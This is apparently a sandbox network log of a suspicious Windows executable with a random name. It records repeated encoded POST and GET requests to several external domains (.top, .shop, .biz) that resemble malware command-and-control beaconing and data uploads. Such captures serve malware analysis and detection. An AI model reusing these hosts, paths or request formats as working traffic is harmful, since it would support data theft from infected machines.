                                                Aug 27, 2024 07:59:56.100444078 CEST | 1289 | IN | Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 07:59:56.100456953 CEST | 277 | IN | Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                26 | 192.168.11.20 | 49867 | 18.183.3.45 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:58.625627041 CEST | 1172 | OUT | POST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:58.889554977 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 05:59:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                27 | 192.168.11.20 | 49868 | 18.183.3.45 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:01.421161890 CEST | 1289 | OUT | POST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:01.684490919 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:00:01 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                28 | 192.168.11.20 | 49869 | 18.183.3.45 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:04.218980074 CEST | 552 | OUT | GET /y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:04.485450029 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:00:04 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                29 | 192.168.11.20 | 49870 | 154.23.184.207 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:09.928021908 CEST | 802 | OUT | POST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:10.236835957 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                30 | 192.168.11.20 | 49871 | 154.23.184.207 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:12.768650055 CEST | 1142 | OUT | POST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:13.070954084 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:12 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                31 | 192.168.11.20 | 49872 | 154.23.184.207 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:15.625886917 CEST | 1289 | OUT | POST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:16.617058992 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                32 | 192.168.11.20 | 49873 | 154.23.184.207 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:18.473742008 CEST | 542 | OUT | GET /pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:18.796854973 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                33 | 192.168.11.20 | 49874 | 185.230.15.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:24.168150902 CEST | 823 | OUT | POST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:24.459789038 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                34 | 192.168.11.20 | 49875 | 185.230.15.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:26.937452078 CEST | 1163 | OUT | POST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:27.228481054 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                35 | 192.168.11.20 | 49876 | 185.230.15.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:29.703767061 CEST | 2578 | OUT | POST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: cMPK5TnyFfnbe8y1yISr5nMZnDDfcRxfTgqhAlejuQW8TWEIaLOCWj7ymsWVQx5I7TPVaUJXzuUCsqA2iAb5oa/rK/El6uQiSHoE7mFDvYcog2si7yW8nJey7brl4AP3QhoHBSuAPHKKJwOjNubT+7Nmk8/kT8dMmMCsHM+d9ECcusw6aR4xmxwZUCg4rHIgdaBt4K5qzwdGhOXXdL5TC288MqZrr0t5MVCEbpD/XmRUGBhW8uC
                                                Aug 27, 2024 08:00:29.943906069 CEST2578OUTData Raw: 76 4e 55 44 6d 4b 4a 73 38 4b 51 6d 4f 46 72 64 32 61 44 61 49 53 72 64 37 6b 69 48 63 34 56 79 32 6d 6b 6a 4b 54 57 36 63 78 66 36 42 51 45 35 44 69 66 77 31 77 31 69 52 74 68 37 35 75 76 30 70 4c 32 4a 36 4e 65 2f 2f 54 61 32 79 5a 71 74 6c 48
                                                Data Ascii: vNUDmKJs8KQmOFrd2aDaISrd7kiHc4Vy2mkjKTW6cxf6BQE5Difw1w1iRth75uv0pL2J6Ne//Ta2yZqtlHjcvJAS2MkYG4mtK0/WES8vR38Szt/l4sY9Whfxo3i3nMY128Q1mOrSD7lV712hLzLCFHMwsnIyOr5jM7e9hTHkf4UyNyFNOu9yT8BS1aiieN1n2DkzhzH9LSyAkzN6K3btDuBNCzo6VBaorUzFL1JBe7PkAnZTsd4
                                                Aug 27, 2024 08:00:29.944066048 CEST9023OUTData Raw: 31 4e 47 48 7a 56 78 43 30 37 44 37 46 53 38 35 32 74 6b 57 48 51 51 2f 4d 43 6e 31 4d 47 55 4d 61 6c 58 51 69 2f 71 74 2f 59 6a 46 4a 64 4f 63 52 69 58 71 4f 4d 32 79 31 36 44 31 58 63 51 6f 46 46 49 4b 77 4e 50 47 68 54 69 6c 32 61 6c 74 48 58
                                                Data Ascii: 1NGHzVxC07D7FS852tkWHQQ/MCn1MGUMalXQi/qt/YjFJdOcRiXqOM2y16D1XcQoFFIKwNPGhTil2altHXOHNhxmCTp9IMUZKcMreeMiJMSy/nvmtgaTXC7WYKNolMOl0S1cRhbo1rGp//6cFPCslYedbsQUqhwwP/eswJnF9lFyxv8PfMsE6FDrRsCA4RO5kFsVQjc9oAdSsA+jcf/IuwodTtQZaSisS2rBTuDRElsvx1zlep1
                                                Aug 27, 2024 08:00:29.944204092 CEST6445OUTData Raw: 52 6e 4f 49 4f 37 52 57 52 79 62 46 67 44 56 6a 69 6a 54 6c 4d 36 41 65 59 33 58 41 70 72 61 74 6d 5a 44 30 34 51 45 34 58 6b 54 77 44 31 64 31 59 59 70 37 71 38 38 35 76 30 7a 34 30 55 74 53 2b 30 38 67 4e 4b 33 75 35 52 46 50 65 46 36 4d 5a 56
                                                Data Ascii: RnOIO7RWRybFgDVjijTlM6AeY3XApratmZD04QE4XkTwD1d1YYp7q885v0z40UtS+08gNK3u5RFPeF6MZVa4mHJwJHxLwtolr5u1WzPPAolAM/8UT2bwlJn7ik6jez5E/K9BbXxuK5/mFJ4t1cZDSsYruDNVTUgDsu7D1YAmBhMHV8Cstfv3clkQPq40mA2dbsuEEbqacScW+LCi+KHeW2Yk92Rg7CFdzVijii42NTOJXg8lgNd
                                                Aug 27, 2024 08:00:30.182931900 CEST1289OUTData Raw: 4e 78 4e 4b 42 50 53 57 52 6a 32 38 63 62 39 54 6d 61 64 52 59 36 6a 66 73 4a 4a 4f 4f 4a 42 49 76 6c 66 74 44 38 5a 54 38 43 36 54 51 6f 35 39 66 61 52 51 6d 72 67 59 66 51 77 41 56 35 48 49 42 78 61 38 39 42 6d 67 36 42 63 4c 49 53 31 53 4d 32
                                                Data Ascii: NxNKBPSWRj28cb9TmadRY6jfsJJOOJBIvlftD8ZT8C6TQo59faRQmrgYfQwAV5HIBxa89Bmg6BcLIS1SM2/TRc9UeIwii1ZIHqZ4eUJmCzu1IGHtiZpQMYckpsjddVPYorpg2Gj7T69Jop2BoJsT+WZu9KF+9JhZEm9/9eA5Z7p/lRLc2XMwPPb+tZASAD3hgK1MUGNgFaMLn7nK02ouDv0uU+5qRBpMANLGGst0ZZ8nmrkPQTy
                                                Aug 27, 2024 08:00:30.481420994 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                36 | 192.168.11.20 | 49877 | 185.230.15.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:32.482604980 CEST | 549 | OUT | GET /ns8q/?wXB=brv4Erb&ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s= HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:32.773437023 CEST | 254 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                37 | 192.168.11.20 | 49878 | 199.59.243.226 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:37.892110109 CEST | 841 | OUT | POST /enra/ HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.foundation-repair.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.foundation-repair.biz/enra/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:37.994493008 CEST | 1200 | IN | HTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:37 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1150
                                                x-request-id: 3cc0cd51-e59e-4b4b-b0cf-cb03530b3db4
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                set-cookie: parking_session=3cc0cd51-e59e-4b4b-b0cf-cb03530b3db4; expires=Tue, 27 Aug 2024 06:15:37 GMT; path=/
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                38 | 192.168.11.20 | 49879 | 199.59.243.226 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:40.530560970 CEST | 1181 | OUT | POST /enra/ HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.foundation-repair.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.foundation-repair.biz/enra/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:40.633126974 CEST | 1200 | IN | HTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:39 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1150
                                                x-request-id: 5d474b03-ff77-4a95-9c4f-b0acbe0680c3
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                set-cookie: parking_session=5d474b03-ff77-4a95-9c4f-b0acbe0680c3; expires=Tue, 27 Aug 2024 06:15:40 GMT; path=/
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                39 | 192.168.11.20 | 49880 | 199.59.243.226 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:43.171567917 CEST | 2578 | OUT | POST /enra/ HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.foundation-repair.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.foundation-repair.biz/enra/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:43.476402998 CEST | 1200 | IN | HTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:42 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1150
                                                x-request-id: fa03124e-82a9-4f3b-8143-960ab31e0484
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                set-cookie: parking_session=fa03124e-82a9-4f3b-8143-960ab31e0484; expires=Tue, 27 Aug 2024 06:15:43 GMT; path=/
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                40 | 192.168.11.20 | 49881 | 199.59.243.226 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:45.807940006 CEST | 555 | OUT | GET /enra/?ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&wXB=brv4Erb HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:45.910274029 CEST | 1200 | IN | HTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:45 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1478
                                                x-request-id: 3b15f141-f93f-4847-8320-b14eefcb73b7
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
